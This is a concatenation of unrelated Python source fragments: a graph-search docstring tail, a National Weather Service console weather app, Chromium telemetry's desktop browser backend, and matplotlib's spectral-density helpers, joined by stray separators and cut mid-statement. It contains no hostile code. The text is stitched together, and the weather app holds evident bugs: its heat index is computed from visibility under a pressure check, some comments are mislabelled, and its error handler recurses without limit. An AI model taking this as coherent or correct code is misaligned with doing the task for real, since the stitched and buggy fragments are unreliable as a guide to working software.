except StopIteration:
stack.pop()
def bfs_conditional(G, source, reverse=False, keys=True, data=False,
yield_nodes=True, yield_if=None,
continue_if=None, visited_nodes=None,
yield_source=False):
"""
Produce edges in a breadth-first-search starting at source, but only return
nodes that satisfiy a condition, and only iterate past a node if it
satisfies a different condition.
conditions are callables that take (G, child, edge) and return true or false
CommandLine:
python -m utool.util_graph bfs_conditional
Example:
| |
"""
Name: one_call_class.py
Author:
Created:
Purpose: OOP console app
Get lat and lon from Openweather map current weather
Use lat and lon for One Call Weather
"""
import requests
import textwrap
import os # Clear the console
import weather_utils
# Import geocode_geopy module for reverse geocode
import geocode_geopy
from datetime import datetime
from time import sleep
class WeatherClass:
def __init__(self):
""" Initialize object """
self.clear_console()
print(weather_utils.title("Welcome to Bill's NWS Weather App!"))
self.__decorator_width = 75
#--------------------------------- GET LOCATION -------------------------------------#
def get_location(self):
"""
Get weather location and weather information
"""
PAUSE = 1
try:
# Get location input from user
city = input("Enter city: ")
state = input("Enter state: ")
country = input("Enter country: ")
# Get location input from user
lat, lng, self.__address = geocode_geopy.geocode(city, state, country)
print(self.__address)
# Get the gridpoints from lat and lng
points_url = weather_utils.NWS_ENDPOINT + "/points/" + \
str(lat) + "," + str(lng)
# Get the gridpoints response
response = requests.get(points_url, timeout=1)
# Get gridpoints dictionary
if(response.status_code == 200):
print("[+] The connection to the National Weather Service was successful.")
# Get the gridpoints dictionary
grid_points_dict = response.json()
# \r return to the beginning of the line before printing
# , end="" Print on the same line
print(f"\r[+] Loading weather data [## ]", end="")
# Get the forecast url from the gridpoints dictionary
forecast_url = grid_points_dict.get("properties").get("forecast")
# station_url = grid_points.get("properties").get("observationStations")
response = requests.get(forecast_url, timeout=1)
sleep(PAUSE)
else:
print("[-] Did not get NWS Gridpoints")
# Get 7 day forecast dictionary
if(response.status_code == 200):
# Get forecast dictionary
forecast_dict = response.json()
print(f"\r[+] Loading weather data [#### ]", end="")
self.forecast_list = forecast_dict.get("properties").get("periods")
# Get observation station URL
forecast_hourly_url = grid_points_dict.get(
"properties").get("forecastHourly")
response = requests.get(forecast_hourly_url, timeout=1)
sleep(PAUSE)
else:
print(
f"[-] Did not get NWS 7 Day Forecast - Response: {response.status_code}")
# Get hourly forecast
if(response.status_code == 200):
# Get forecast dictionary
forecast_hourly_dict = response.json()
print(f"\r[+] Loading weather data [###### ]", end="")
self.forecast_hourly_list = forecast_hourly_dict.get(
"properties").get("periods")
# Get observation station URL
stations_url = grid_points_dict.get(
"properties").get("observationStations")
response = requests.get(stations_url, timeout=1)
sleep(PAUSE)
else:
print(
f"[-] Did not get NWS Hourly Forecast - Response: {response.status_code}")
# Get observation station ids
if(response.status_code == 200):
# Get station dictionary
self.station_dict = response.json()
print(f"\r[+] Loading weather data [######## ]", end="")
# Get first station id in list
self.station_id = self.station_dict.get("features")[0].get(
"properties").get("stationIdentifier")
observations_url = weather_utils.NWS_ENDPOINT + \
"stations/" + self.station_id + "/observations/latest"
response = requests.get(observations_url, timeout=1)
sleep(PAUSE)
else:
print(
f"[-] Did not get Station ID - - Response: {response.status_code}")
# Get latest observation from station
if(response.status_code == 200):
# Get latest observation dictionary
self.weather_dict = response.json()
print(f"\r[+] Loading weather data [########## ]", end="")
sleep(PAUSE)
else:
print(
f"[-] Did not get NWS latest weather observation - Response: {response.status_code}")
# Get weather alerts for the area
if(response.status_code == 200):
alerts_url = f"https://api.weather.gov/alerts?point={lat},{lng}"
response = requests.get(alerts_url)
print(f"\r[+] Loading weather data [############ ]", end="")
self.alert_dict = response.json()
sleep(PAUSE)
active_alerts_url = f"https://api.weather.gov/alerts/active?point={lat},{lng}"
response = requests.get(active_alerts_url, timeout=1)
print(f"\r[+] Loading weather data [##############]")
self.active_alert_dict = response.json()
sleep(PAUSE)
else:
print(
f"[-] Did not get NWS Weather Alerts - Response: {response.status_code}")
except Exception as e:
print("Something went wrong. Let's try again")
print(e)
self.get_location()
# raise exception is used to troubleshoot
# It raises the exception that was handled
# raise exception
#-------------------------- GET ACTIVE WEATHER ALERTS ----------------------------#
def get_active_weather_alerts(self):
""" Get weather alerts """
print("="*self.__decorator_width)
print(f"National Weather Service Active Weather Alerts")
print(f"{self.__address}")
print("="*self.__decorator_width)
# print(self.alert_dict.get("features")[0].get("properties").get("areaDesc"))
active_alert_list = self.active_alert_dict.get("features")[:]
# If active weather alert list is not empty
if active_alert_list != []:
for alert in active_alert_list:
area = alert.get("properties").get("areaDesc")
headline = alert.get("properties").get("headline")
description = alert.get("properties").get("description")
effective = alert.get("properties").get("effective")
effective = datetime.fromisoformat(effective)
effective = effective.strftime(
"%m/%d/%Y, %I:%M %p") # , %-I:%M %p
expires = alert.get("properties").get("expires")
expires = datetime.fromisoformat(expires)
expires = expires.strftime("%m/%d/%Y, %I:%M %p") # , %-I:%M %p
wrapper = textwrap.TextWrapper(width=70)
area = wrapper.fill(text=area)
headline = wrapper.fill(text=headline)
description = wrapper.fill(text=description)
print("*" * 70)
print(f"Effective: {effective}")
print(f"Expires: {expires}")
print(f"{area}")
print(f"{headline}")
print(f"{description}")
input("Press the enter key for the next alert")
else:
print("No active weather alerts at this time.")
#-------------------------- GET WEATHER ALERTS ----------------------------#
def get_weather_alerts(self):
""" Get weather alerts """
print("="*self.__decorator_width)
print(f"National Weather Service Weather Alerts")
print(f"{self.__address}")
print("="*self.__decorator_width)
# print(self.alert_dict.get("features")[0].get("properties").get("areaDesc"))
alert_list = self.alert_dict.get("features")[:]
# If weather alert list is not empty
if alert_list != []:
for alert in alert_list:
area = alert.get("properties").get("areaDesc")
headline = alert.get("properties").get("headline")
description = alert.get("properties").get("description")
effective = alert.get("properties").get("effective")
effective = datetime.fromisoformat(effective)
effective = effective.strftime(
"%m/%d/%Y, %I:%M %p") # , %-I:%M %p
expires = alert.get("properties").get("expires")
expires = datetime.fromisoformat(expires)
expires = expires.strftime("%m/%d/%Y, %I:%M %p") # , %-I:%M %p
wrapper = textwrap.TextWrapper(width=70)
area = wrapper.fill(text=area)
headline = wrapper.fill(text=headline)
description = wrapper.fill(text=description)
print("*" * 70)
print(f"Effective: {effective}")
print(f"Expires: {expires}")
print(f"{area}")
print(f"{headline}")
print(f"{description}")
input("Press the enter key for the next alert")
else:
print("No weather alerts at this time.")
#-------------------------- GET 12 HOUR FORECAST ----------------------------#
def get_twelve_hour_forecast(self):
""" Get hourly forecast """
print("="*self.__decorator_width)
print(
f"National Weather Service 12 Hour Weather Forecast")
print(f"{self.__address}")
print("="*self.__decorator_width)
# Slice 12 hours out of the hourly forecast list
hourly_slice = self.forecast_hourly_list[:12]
# Iterate through each item in the forecast list
for forecast_item in hourly_slice:
start_time = forecast_item.get("startTime")
temperature = forecast_item.get("temperature")
wind_speed = forecast_item.get("windSpeed")
wind_direction = forecast_item.get("windDirection")
short_forecast = forecast_item.get("shortForecast")
time = datetime.fromisoformat(start_time)
time = time.strftime('%I:%M %p')
print(
f"{time:>8}: {temperature:>5.1f}°F | {wind_speed:>8} | {wind_direction:>5} | {short_forecast}")
#-------------------------- GET LATEST WEATHER OBSERVATION ----------------------------#
def get_weather(self):
""" Get latest observation from the closest NWS station """
# Get nearest stationid
self.station_name = self.station_dict.get(
"features")[0].get("properties").get("name")
# Get latest weather observation from dictionary
# Shorten up weather observations dictionary code
weather_obs = self.weather_dict.get("properties")
timestamp = weather_obs.get("timestamp")
timestamp = datetime.fromisoformat(timestamp)
self.__timestamp = timestamp.strftime("%m/%d/%Y, %I:%M %p")
self.__description = weather_obs.get("textDescription")
temperature = weather_obs.get("temperature").get("value")
self.__temperature = weather_utils.celsius_to_fahrenheit(temperature)
dewpoint = weather_obs.get("dewpoint").get("value")
if not (dewpoint is None):
self.__dewpoint = round(dewpoint, 1)
else:
self.__dewpoint = "NA"
humidity = weather_obs.get("relativeHumidity").get("value")
if not (humidity is None):
self.__humidity = round(humidity)
else:
self.__humidity = "NA"
wind_speed = weather_obs.get("windSpeed").get("value")
if not (wind_speed is None):
# Convert kph to mph
self.__wind__speed = round(wind_speed * .62137, 1)
else:
self.__wind__speed = "NA"
wind_direction = weather_obs.get("windDirection").get("value")
if not (wind_direction is None):
# Convert kph to mph
self.__degree = wind_direction
self.__wind_cardinal = weather_utils.degrees_to_cardinal(
wind_direction)
else:
self.__degree = "NA"
self.__wind_cardinal = "NA"
pressure = weather_obs.get("barometricPressure").get("value")
if not (pressure is None):
# Convert pascals to inches of mercury inHg
self.__pressure = round(pressure / 3386, 2)
else:
self.__pressure = "NA"
visibility = weather_obs.get("visibility").get("value")
if not (visibility is None):
self.__visibility = round((visibility * 3.28084) / 5280)
else:
self.__visibility = "NA"
windchill = weather_obs.get("windChill").get("value")
if not (windchill is None):
# Convert meters to miles
self.__windchill = weather_utils.celsius_to_fahrenheit(windchill)
else:
self.__windchill = "NA"
heatindex = weather_obs.get("visibility").get("value")
if not (pressure is None):
# Convert meters to miles
self.__heatindex = round(heatindex * 0.000621371)
else:
self.__heatindex = "NA"
elevation = weather_obs.get("elevation").get("value")
if not (elevation is None):
# Convert meters to miles
self.__elevation = round(elevation * 3.28084)
else:
self.__elevation = "NA"
#-------------------------- DISPLAY LATEST WEATHER OBSERVATION ----------------------------#
def display_weather(self):
WIDTH = 15
print("="*self.__decorator_width)
print(f"National Weather Service Latest Weather Observations")
print(
f"Station: {self.station_id} {self.station_name} {self.__timestamp}")
print("="*self.__decorator_width)
print(f"{self.__description}")
print(f"{'Temperature:':{WIDTH}} {self.__temperature}°F")
print(f"{'Dew Point:':{WIDTH}} {self.__dewpoint}°F")
print(f"{'Humidity:':{WIDTH}} {self.__humidity}%")
print(
f"{'Wind:':{WIDTH}} {self.__wind__speed} mph {self.__degree}° {self.__wind_cardinal}")
print(f"{'Pressure:':{WIDTH}} {self.__pressure} inHg")
print(f"{'Visibility:':{WIDTH}} {self.__visibility} mi")
print(
f"{'WindChill:':{WIDTH}} {self.__windchill}°F {'Heat Index:'} {self.__heatindex}°F")
print(f"{'Elevation:':{WIDTH}} {self.__elevation} feet")
#-------------------------- GET 7 DAY FORECAST ----------------------------#
def get_forecast(self):
print("="*self.__decorator_width)
print(
f"National Weather Service 7 Day Weather Forecast")
print(f"{self.__address}")
print("="*self.__decorator_width)
# Iterate through each item in the forecast list
for forecast_item in self.forecast_list:
# start_time = forecast_item.get("startTime")
name = forecast_item.get("name")
temperature = forecast_item.get("temperature")
wind_speed = forecast_item.get("windSpeed")
wind_direction = forecast_item.get("windDirection")
short_forecast = forecast_item.get("shortForecast")
# detailed_forecast = forecast_item.get("detailedForecast")
# time = datetime.fromisoformat(start_time)
# time = time.strftime('%m-%d-%Y')
# print(f"{name}: {detailed_forecast}")
print(
f"{name:<15} {temperature:>4}°F | {wind_speed:12} {wind_direction:5} | {short_forecast}")
# print(f'{detailed_forecast}')
#-------------------------- GET 7 DAY DETAILED FORECAST ----------------------------#
def get_detailed_forecast(self):
print("="*self.__decorator_width)
print(
f"National Weather Service 7 Day Weather Forecast")
print(f"{self.__address}")
print("="*self.__decorator_width)
counter = 0
# Iterate through each item in the forecast list
for forecast_item in self.forecast_list:
# start_time = forecast_item.get("startTime")
name = forecast_item.get("name")
# temperature = forecast_item.get("temperature")
# wind_speed = forecast_item.get("windSpeed")
# wind_direction = forecast_item.get("windDirection")
# short_forecast = forecast_item.get("shortForecast")
detailed_forecast = forecast_item.get("detailedForecast")
wrapper = textwrap.TextWrapper(width=60)
detailed_forecast = wrapper.fill(text=detailed_forecast)
# time = datetime.fromisoformat(start_time)
| |
<filename>Source/chrome/tools/telemetry/telemetry/core/backends/chrome/desktop_browser_backend.py
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import datetime
import glob
import heapq
import logging
import os
import os.path
import re
import shutil
import subprocess as subprocess
import sys
import tempfile
import time
from telemetry.core.backends import browser_backend
from telemetry.core.backends.chrome import chrome_browser_backend
from telemetry.core import exceptions
from telemetry.core import util
from telemetry.util import path
from telemetry.util import support_binaries
def ParseCrashpadDateTime(date_time_str):
# Python strptime does not support time zone parsing, strip it.
date_time_parts = date_time_str.split()
if len(date_time_parts) >= 3:
date_time_str = ' '.join(date_time_parts[:2])
return datetime.datetime.strptime(date_time_str, '%Y-%m-%d %H:%M:%S')
class DesktopBrowserBackend(chrome_browser_backend.ChromeBrowserBackend):
"""The backend for controlling a locally-executed browser instance, on Linux,
Mac or Windows.
"""
def __init__(self, desktop_platform_backend, browser_options, executable,
flash_path, is_content_shell, browser_directory,
output_profile_path, extensions_to_load):
super(DesktopBrowserBackend, self).__init__(
desktop_platform_backend,
supports_tab_control=not is_content_shell,
supports_extensions=not is_content_shell,
browser_options=browser_options,
output_profile_path=output_profile_path,
extensions_to_load=extensions_to_load)
# Initialize fields so that an explosion during init doesn't break in Close.
self._proc = None
self._tmp_profile_dir = None
self._tmp_output_file = None
self._executable = executable
if not self._executable:
raise Exception('Cannot create browser, no executable found!')
assert not flash_path or os.path.exists(flash_path)
self._flash_path = flash_path
self._is_content_shell = is_content_shell
if len(extensions_to_load) > 0 and is_content_shell:
raise browser_backend.ExtensionsNotSupportedException(
'Content shell does not support extensions.')
self._browser_directory = browser_directory
self._port = None
self._tmp_minidump_dir = tempfile.mkdtemp()
self._crash_service = None
self._SetupProfile()
def _SetupProfile(self):
if not self.browser_options.dont_override_profile:
if self._output_profile_path:
self._tmp_profile_dir = self._output_profile_path
else:
self._tmp_profile_dir = tempfile.mkdtemp()
profile_dir = self.browser_options.profile_dir
if profile_dir:
assert self._tmp_profile_dir != profile_dir
if self._is_content_shell:
logging.critical('Profiles cannot be used with content shell')
sys.exit(1)
logging.info("Using profile directory:'%s'." % profile_dir)
shutil.rmtree(self._tmp_profile_dir)
shutil.copytree(profile_dir, self._tmp_profile_dir)
if self.browser_options.use_devtools_active_port:
# No matter whether we're using an existing profile directory or
# creating a new one, always delete the well-known file containing
# the active DevTools port number.
port_file = self._GetDevToolsActivePortPath()
if os.path.isfile(port_file):
try:
os.remove(port_file)
except Exception as e:
logging.critical('Unable to remove DevToolsActivePort file: %s' % e)
sys.exit(1)
def _GetDevToolsActivePortPath(self):
return os.path.join(self.profile_directory, 'DevToolsActivePort')
def _GetCrashServicePipeName(self):
# Ensure a unique pipe name by using the name of the temp dir.
return r'\\.\pipe\%s_service' % os.path.basename(self._tmp_minidump_dir)
def _StartCrashService(self):
os_name = self.browser.platform.GetOSName()
if os_name != 'win':
return None
arch_name = self.browser.platform.GetArchName()
command = support_binaries.FindPath('crash_service', arch_name, os_name)
if not command:
logging.warning('crash_service.exe not found for %s %s',
arch_name, os_name)
return None
return subprocess.Popen([
command,
'--no-window',
'--dumps-dir=%s' % self._tmp_minidump_dir,
'--pipe-name=%s' % self._GetCrashServicePipeName()])
def _GetCdbPath(self):
possible_paths = (
'Debugging Tools For Windows',
'Debugging Tools For Windows (x86)',
'Debugging Tools For Windows (x64)',
os.path.join('Windows Kits', '8.0', 'Debuggers', 'x86'),
os.path.join('Windows Kits', '8.0', 'Debuggers', 'x64'),
os.path.join('win_toolchain', 'vs2013_files', 'win8sdk', 'Debuggers',
'x86'),
os.path.join('win_toolchain', 'vs2013_files', 'win8sdk', 'Debuggers',
'x64'),
)
for possible_path in possible_paths:
app_path = os.path.join(possible_path, 'cdb.exe')
app_path = path.FindInstalledWindowsApplication(app_path)
if app_path:
return app_path
return None
def HasBrowserFinishedLaunching(self):
# In addition to the functional check performed by the base class, quickly
# check if the browser process is still alive.
if not self.IsBrowserRunning():
raise exceptions.ProcessGoneException(
"Return code: %d" % self._proc.returncode)
if self.browser_options.use_devtools_active_port:
# The Telemetry user selected the new code path to start DevTools on
# an ephemeral port. Wait for the well-known file containing the port
# number to exist.
port_file = self._GetDevToolsActivePortPath()
if not os.path.isfile(port_file):
# File isn't ready yet. Return false. Will retry.
return False
# Attempt to avoid reading the file until it's populated.
got_port = False
try:
if os.stat(port_file).st_size > 0:
with open(port_file) as f:
port_string = f.read()
self._port = int(port_string)
logging.info('Discovered ephemeral port %s' % self._port)
got_port = True
except Exception:
# Both stat and open can throw exceptions.
pass
if not got_port:
# File isn't ready yet. Return false. Will retry.
return False
return super(DesktopBrowserBackend, self).HasBrowserFinishedLaunching()
def GetBrowserStartupArgs(self):
args = super(DesktopBrowserBackend, self).GetBrowserStartupArgs()
if self.browser_options.use_devtools_active_port:
self._port = 0
else:
self._port = util.GetUnreservedAvailableLocalPort()
logging.info('Requested remote debugging port: %d' % self._port)
args.append('--remote-debugging-port=%i' % self._port)
args.append('--enable-crash-reporter-for-testing')
if not self._is_content_shell:
args.append('--window-size=1280,1024')
if self._flash_path:
args.append('--ppapi-flash-path=%s' % self._flash_path)
if not self.browser_options.dont_override_profile:
args.append('--user-data-dir=%s' % self._tmp_profile_dir)
return args
def Start(self):
assert not self._proc, 'Must call Close() before Start()'
args = [self._executable]
args.extend(self.GetBrowserStartupArgs())
if self.browser_options.startup_url:
args.append(self.browser_options.startup_url)
env = os.environ.copy()
env['CHROME_HEADLESS'] = '1' # Don't upload minidumps.
env['BREAKPAD_DUMP_LOCATION'] = self._tmp_minidump_dir
env['CHROME_BREAKPAD_PIPE_NAME'] = self._GetCrashServicePipeName()
self._crash_service = self._StartCrashService()
logging.debug('Starting Chrome %s', args)
if not self.browser_options.show_stdout:
self._tmp_output_file = tempfile.NamedTemporaryFile('w', 0)
self._proc = subprocess.Popen(
args, stdout=self._tmp_output_file, stderr=subprocess.STDOUT, env=env)
else:
self._proc = subprocess.Popen(args, env=env)
try:
self._WaitForBrowserToComeUp()
self._InitDevtoolsClientBackend()
if self._supports_extensions:
self._WaitForExtensionsToLoad()
except:
self.Close()
raise
@property
def pid(self):
if self._proc:
return self._proc.pid
return None
@property
def browser_directory(self):
return self._browser_directory
@property
def profile_directory(self):
return self._tmp_profile_dir
def IsBrowserRunning(self):
return self._proc and self._proc.poll() == None
def GetStandardOutput(self):
if not self._tmp_output_file:
if self.browser_options.show_stdout:
# This can happen in the case that loading the Chrome binary fails.
# We print rather than using logging here, because that makes a
# recursive call to this function.
print >> sys.stderr, "Can't get standard output with --show-stdout"
return ''
self._tmp_output_file.flush()
try:
with open(self._tmp_output_file.name) as f:
return f.read()
except IOError:
return ''
def _GetMostRecentCrashpadMinidump(self):
os_name = self.browser.platform.GetOSName()
arch_name = self.browser.platform.GetArchName()
crashpad_database_util = support_binaries.FindPath(
'crashpad_database_util', arch_name, os_name)
if not crashpad_database_util:
return None
report_output = subprocess.check_output([
crashpad_database_util, '--database=' + self._tmp_minidump_dir,
'--show-pending-reports', '--show-completed-reports',
'--show-all-report-info'])
last_indentation = -1
reports_list = []
report_dict = {}
for report_line in report_output.splitlines():
# Report values are grouped together by the same indentation level.
current_indentation = 0
for report_char in report_line:
if not report_char.isspace():
break
current_indentation += 1
# Decrease in indentation level indicates a new report is being printed.
if current_indentation >= last_indentation:
report_key, report_value = report_line.split(':', 1)
if report_value:
report_dict[report_key.strip()] = report_value.strip()
elif report_dict:
try:
report_time = ParseCrashpadDateTime(report_dict['Creation time'])
report_path = report_dict['Path'].strip()
reports_list.append((report_time, report_path))
except (ValueError, KeyError) as e:
logging.warning('Crashpad report expected valid keys'
' "Path" and "Creation time": %s', e)
finally:
report_dict = {}
last_indentation = current_indentation
# Include the last report.
if report_dict:
try:
report_time = ParseCrashpadDateTime(report_dict['Creation time'])
report_path = report_dict['Path'].strip()
reports_list.append((report_time, report_path))
except (ValueError, KeyError) as e:
logging.warning('Crashpad report expected valid keys'
' "Path" and "Creation time": %s', e)
if reports_list:
_, most_recent_report_path = max(reports_list)
return most_recent_report_path
return None
def _GetMostRecentMinidump(self):
# Crashpad dump layout will be the standard eventually, check it first.
most_recent_dump = self._GetMostRecentCrashpadMinidump()
# Typical breakpad format is simply dump files in a folder.
if not most_recent_dump:
dumps = glob.glob(os.path.join(self._tmp_minidump_dir, '*.dmp'))
if dumps:
most_recent_dump = heapq.nlargest(1, dumps, os.path.getmtime)[0]
# As a sanity check, make sure the crash dump is recent.
if (most_recent_dump and
os.path.getmtime(most_recent_dump) < (time.time() - (5 * 60))):
logging.warning('Crash dump is older than 5 minutes. May not be correct.')
return most_recent_dump
def _IsExecutableStripped(self):
if self.browser.platform.GetOSName() == 'mac':
symbols = subprocess.check_output(['/usr/bin/nm', self._executable])
num_symbols = len(symbols.splitlines())
# We assume that if there are more than 10 symbols the executable is not
# stripped.
return num_symbols < 10
else:
return False
def _GetStackFromMinidump(self, minidump):
os_name = self.browser.platform.GetOSName()
if os_name == 'win':
cdb = self._GetCdbPath()
if not cdb:
logging.warning('cdb.exe not found.')
return None
output = subprocess.check_output([cdb, '-y', self._browser_directory,
'-c', '.ecxr;k30;q', '-z', minidump])
# cdb output can start the stack with "ChildEBP", "Child-SP", and possibly
# other things we haven't seen yet. If we can't find the start of the
# stack, include output from the beginning.
stack_start = 0
stack_start_match = re.search("^Child(?:EBP|-SP)", output, re.MULTILINE)
if stack_start_match:
stack_start = stack_start_match.start()
stack_end = output.find('quit:')
return output[stack_start:stack_end]
arch_name = self.browser.platform.GetArchName()
stackwalk = support_binaries.FindPath(
'minidump_stackwalk', arch_name, os_name)
if not stackwalk:
logging.warning('minidump_stackwalk binary not found.')
return None
with open(minidump, 'rb') as infile:
minidump += '.stripped'
with open(minidump, 'wb') as outfile:
outfile.write(''.join(infile.read().partition('MDMP')[1:]))
symbols_path = os.path.join(self._tmp_minidump_dir, 'symbols')
symbols = glob.glob(os.path.join(self._browser_directory, '*.breakpad*'))
if symbols:
for symbol in sorted(symbols, key=os.path.getmtime, reverse=True):
if not os.path.isfile(symbol):
continue
with open(symbol, 'r') as f:
fields = f.readline().split()
if not fields:
continue
sha = fields[3]
binary = ' '.join(fields[4:])
symbol_path = os.path.join(symbols_path, binary, sha)
if os.path.exists(symbol_path):
continue
os.makedirs(symbol_path)
shutil.copyfile(symbol, os.path.join(symbol_path, binary + '.sym'))
else:
# On some platforms generating the symbol table can be very time
# consuming, skip it if there's nothing to dump.
if self._IsExecutableStripped():
logging.info('%s appears to be stripped, skipping symbol dump.' % (
self._executable))
return
logging.info('Dumping breakpad symbols.')
generate_breakpad_symbols_path = os.path.join(
util.GetChromiumSrcDir(), "components", "crash",
"tools", "generate_breakpad_symbols.py")
cmd = [
sys.executable,
generate_breakpad_symbols_path,
'--binary=%s' % self._executable,
'--symbols-dir=%s' % symbols_path,
'--build-dir=%s' % self._browser_directory,
]
try:
subprocess.check_output(cmd, stderr=open(os.devnull, 'w'))
except subprocess.CalledProcessError:
logging.warning('Failed to | |
(pad_to - 1)//2 + 1
else:
freqcenter = pad_to//2
scaling_factor = 1.
elif sides == 'onesided':
if pad_to % 2:
numFreqs = (pad_to + 1)//2
else:
numFreqs = pad_to//2 + 1
scaling_factor = 2.
if not np.iterable(window):
window = window(np.ones(NFFT, x.dtype))
if len(window) != NFFT:
raise ValueError(
"The window length must match the data's first dimension")
result = stride_windows(x, NFFT, noverlap, axis=0)
result = detrend(result, detrend_func, axis=0)
result = result * window.reshape((-1, 1))
result = np.fft.fft(result, n=pad_to, axis=0)[:numFreqs, :]
freqs = np.fft.fftfreq(pad_to, 1/Fs)[:numFreqs]
if not same_data:
# if same_data is False, mode must be 'psd'
resultY = stride_windows(y, NFFT, noverlap)
resultY = detrend(resultY, detrend_func, axis=0)
resultY = resultY * window.reshape((-1, 1))
resultY = np.fft.fft(resultY, n=pad_to, axis=0)[:numFreqs, :]
result = np.conj(result) * resultY
elif mode == 'psd':
result = np.conj(result) * result
elif mode == 'magnitude':
result = np.abs(result) / np.abs(window).sum()
elif mode == 'angle' or mode == 'phase':
# we unwrap the phase later to handle the onesided vs. twosided case
result = np.angle(result)
elif mode == 'complex':
result /= np.abs(window).sum()
if mode == 'psd':
# Also include scaling factors for one-sided densities and dividing by
# the sampling frequency, if desired. Scale everything, except the DC
# component and the NFFT/2 component:
# if we have a even number of frequencies, don't scale NFFT/2
if not NFFT % 2:
slc = slice(1, -1, None)
# if we have an odd number, just don't scale DC
else:
slc = slice(1, None, None)
result[slc] *= scaling_factor
# MATLAB divides by the sampling frequency so that density function
# has units of dB/Hz and can be integrated by the plotted frequency
# values. Perform the same scaling here.
if scale_by_freq:
result /= Fs
# Scale the spectrum by the norm of the window to compensate for
# windowing loss; see Bendat & Piersol Sec 11.5.2.
result /= (np.abs(window)**2).sum()
else:
# In this case, preserve power in the segment, not amplitude
result /= np.abs(window).sum()**2
t = np.arange(NFFT/2, len(x) - NFFT/2 + 1, NFFT - noverlap)/Fs
if sides == 'twosided':
# center the frequency range at zero
freqs = np.roll(freqs, -freqcenter, axis=0)
result = np.roll(result, -freqcenter, axis=0)
elif not pad_to % 2:
# get the last value correctly, it is negative otherwise
freqs[-1] *= -1
# we unwrap the phase here to handle the onesided vs. twosided case
if mode == 'phase':
result = np.unwrap(result, axis=0)
return result, freqs, t
def _single_spectrum_helper(
mode, x, Fs=None, window=None, pad_to=None, sides=None):
"""
Private helper implementing the commonality between the complex, magnitude,
angle, and phase spectrums.
"""
_api.check_in_list(['complex', 'magnitude', 'angle', 'phase'], mode=mode)
if pad_to is None:
pad_to = len(x)
spec, freqs, _ = _spectral_helper(x=x, y=None, NFFT=len(x), Fs=Fs,
detrend_func=detrend_none, window=window,
noverlap=0, pad_to=pad_to,
sides=sides,
scale_by_freq=False,
mode=mode)
if mode != 'complex':
spec = spec.real
if spec.ndim == 2 and spec.shape[1] == 1:
spec = spec[:, 0]
return spec, freqs
# Split out these keyword docs so that they can be used elsewhere
docstring.interpd.update(
Spectral="""\
Fs : float, default: 2
The sampling frequency (samples per time unit). It is used to calculate
the Fourier frequencies, *freqs*, in cycles per time unit.
window : callable or ndarray, default: `.window_hanning`
A function or a vector of length *NFFT*. To create window vectors see
`.window_hanning`, `.window_none`, `numpy.blackman`, `numpy.hamming`,
`numpy.bartlett`, `scipy.signal`, `scipy.signal.get_window`, etc. If a
function is passed as the argument, it must take a data segment as an
argument and return the windowed version of the segment.
sides : {'default', 'onesided', 'twosided'}, optional
Which sides of the spectrum to return. 'default' is one-sided for real
data and two-sided for complex data. 'onesided' forces the return of a
one-sided spectrum, while 'twosided' forces two-sided.""",
Single_Spectrum="""\
pad_to : int, optional
The number of points to which the data segment is padded when performing
the FFT. While not increasing the actual resolution of the spectrum (the
minimum distance between resolvable peaks), this can give more points in
the plot, allowing for more detail. This corresponds to the *n* parameter
in the call to fft(). The default is None, which sets *pad_to* equal to
the length of the input signal (i.e. no padding).""",
PSD="""\
pad_to : int, optional
The number of points to which the data segment is padded when performing
the FFT. This can be different from *NFFT*, which specifies the number
of data points used. While not increasing the actual resolution of the
spectrum (the minimum distance between resolvable peaks), this can give
more points in the plot, allowing for more detail. This corresponds to
the *n* parameter in the call to fft(). The default is None, which sets
*pad_to* equal to *NFFT*
NFFT : int, default: 256
The number of data points used in each block for the FFT. A power 2 is
most efficient. This should *NOT* be used to get zero padding, or the
scaling of the result will be incorrect; use *pad_to* for this instead.
detrend : {'none', 'mean', 'linear'} or callable, default: 'none'
The function applied to each segment before fft-ing, designed to remove
the mean or linear trend. Unlike in MATLAB, where the *detrend* parameter
is a vector, in Matplotlib is it a function. The :mod:`~matplotlib.mlab`
module defines `.detrend_none`, `.detrend_mean`, and `.detrend_linear`,
but you can use a custom function as well. You can also use a string to
choose one of the functions: 'none' calls `.detrend_none`. 'mean' calls
`.detrend_mean`. 'linear' calls `.detrend_linear`.
scale_by_freq : bool, default: True
Whether the resulting density values should be scaled by the scaling
frequency, which gives density in units of Hz^-1. This allows for
integration over the returned frequency values. The default is True for
MATLAB compatibility.""")
@docstring.dedent_interpd
def psd(x, NFFT=None, Fs=None, detrend=None, window=None,
noverlap=None, pad_to=None, sides=None, scale_by_freq=None):
r"""
Compute the power spectral density.
The power spectral density :math:`P_{xx}` by Welch's average
periodogram method. The vector *x* is divided into *NFFT* length
segments. Each segment is detrended by function *detrend* and
windowed by function *window*. *noverlap* gives the length of
the overlap between segments. The :math:`|\mathrm{fft}(i)|^2`
of each segment :math:`i` are averaged to compute :math:`P_{xx}`.
If len(*x*) < *NFFT*, it will be zero padded to *NFFT*.
Parameters
----------
x : 1-D array or sequence
Array or sequence containing the data
%(Spectral)s
%(PSD)s
noverlap : int, default: 0 (no overlap)
The number of points of overlap between segments.
Returns
-------
Pxx : 1-D array
The values for the power spectrum :math:`P_{xx}` (real valued)
freqs : 1-D array
The frequencies corresponding to the elements in *Pxx*
References
----------
<NAME> -- Random Data: Analysis and Measurement Procedures, John
Wiley & Sons (1986)
See Also
--------
specgram
`specgram` differs in the default overlap; in not returning the mean of
the segment periodograms; and in returning the times of the segments.
magnitude_spectrum : returns the magnitude spectrum.
csd : returns the spectral density between two signals.
"""
Pxx, freqs = csd(x=x, y=None, NFFT=NFFT, Fs=Fs, detrend=detrend,
window=window, noverlap=noverlap, pad_to=pad_to,
sides=sides, scale_by_freq=scale_by_freq)
return Pxx.real, freqs
@docstring.dedent_interpd
def csd(x, y, NFFT=None, Fs=None, detrend=None, window=None,
noverlap=None, pad_to=None, sides=None, scale_by_freq=None):
"""
Compute the cross-spectral density.
The cross spectral density :math:`P_{xy}` by Welch's average
periodogram method. The vectors *x* and *y* are divided into
*NFFT* length segments. Each segment is detrended by function
*detrend* and windowed by function *window*. *noverlap* gives
the length of the overlap between segments. The product of
the direct FFTs of *x* and *y* are averaged over each segment
to compute :math:`P_{xy}`, with a scaling to correct for power
loss due to windowing.
If len(*x*) < *NFFT* or len(*y*) < *NFFT*, they will be zero
padded to *NFFT*.
Parameters
----------
x, y : 1-D arrays or sequences
Arrays or sequences containing the data
%(Spectral)s
%(PSD)s
noverlap : int, default: 0 (no overlap)
The number of points of overlap between segments.
Returns
-------
